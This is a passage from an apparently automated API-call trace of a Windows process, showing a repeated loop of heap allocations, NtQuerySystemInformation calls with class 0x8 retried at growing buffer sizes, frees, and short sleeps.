SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0289.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.769] Sleep (dwMilliseconds=0x110) [0289.829] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0289.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0289.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0289.830] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.830] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0289.830] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0289.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0289.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0289.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.831] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0289.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.832] Sleep (dwMilliseconds=0x110) [0289.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0289.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0289.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0289.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0289.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0289.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0289.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0289.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0289.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.925] Sleep (dwMilliseconds=0x110) [0289.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0289.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0289.971] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0289.971] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0289.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0289.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0289.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0289.972] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0289.972] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0289.972] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0289.973] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0289.973] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0289.973] Sleep (dwMilliseconds=0x110) [0290.006] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0290.006] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.007] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0290.007] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0290.007] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.008] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0290.011] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0290.011] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.012] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0290.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0290.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0290.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.014] Sleep (dwMilliseconds=0x110) [0290.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0290.034] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.034] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0290.034] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0290.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.035] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0290.035] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0290.035] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0290.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0290.036] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0290.036] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.036] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.036] Sleep (dwMilliseconds=0x110) [0290.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0290.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0290.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0290.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0290.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0290.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0290.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0290.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0290.051] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.051] Sleep (dwMilliseconds=0x110) [0290.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0290.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0290.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0290.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0290.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0290.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0290.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0290.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0290.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.064] Sleep (dwMilliseconds=0x110) [0290.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0290.075] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0290.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0290.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0290.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0290.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0290.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0290.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0290.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.082] Sleep (dwMilliseconds=0x110) [0290.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0290.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0290.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0290.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0290.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b510 [0290.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b510, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b510, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b510 | out: hHeap=0x2560000) returned 1 [0290.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c5e0 [0290.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c5e0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c5e0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c5e0 | out: hHeap=0x2560000) returned 1 [0290.098] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.098] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.098] Sleep (dwMilliseconds=0x110) [0290.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0290.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0290.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0290.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0290.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0290.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0290.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0290.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0290.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.110] Sleep (dwMilliseconds=0x110) [0290.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0290.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0290.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0290.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0290.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0290.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0290.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0290.129] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0290.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.129] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.130] Sleep (dwMilliseconds=0x110) [0290.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0290.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0290.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ab58 [0290.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ab58, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0290.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b770 [0290.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b770, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b770, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b770 | out: hHeap=0x2560000) returned 1 [0290.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0290.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0290.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.142] Sleep (dwMilliseconds=0x110) [0290.153] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0290.153] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0290.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285ac28 [0290.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285ac28, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285ac28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ac28 | out: hHeap=0x2560000) returned 1 [0290.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0290.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0290.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d0d0 [0290.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d0d0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d0d0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0290.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d0d0 | out: hHeap=0x2560000) returned 1 [0290.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0290.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0290.157] Sleep (dwMilliseconds=0x110) [0290.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0290.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0290.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0290.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0290.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0290.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0290.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0290.174] 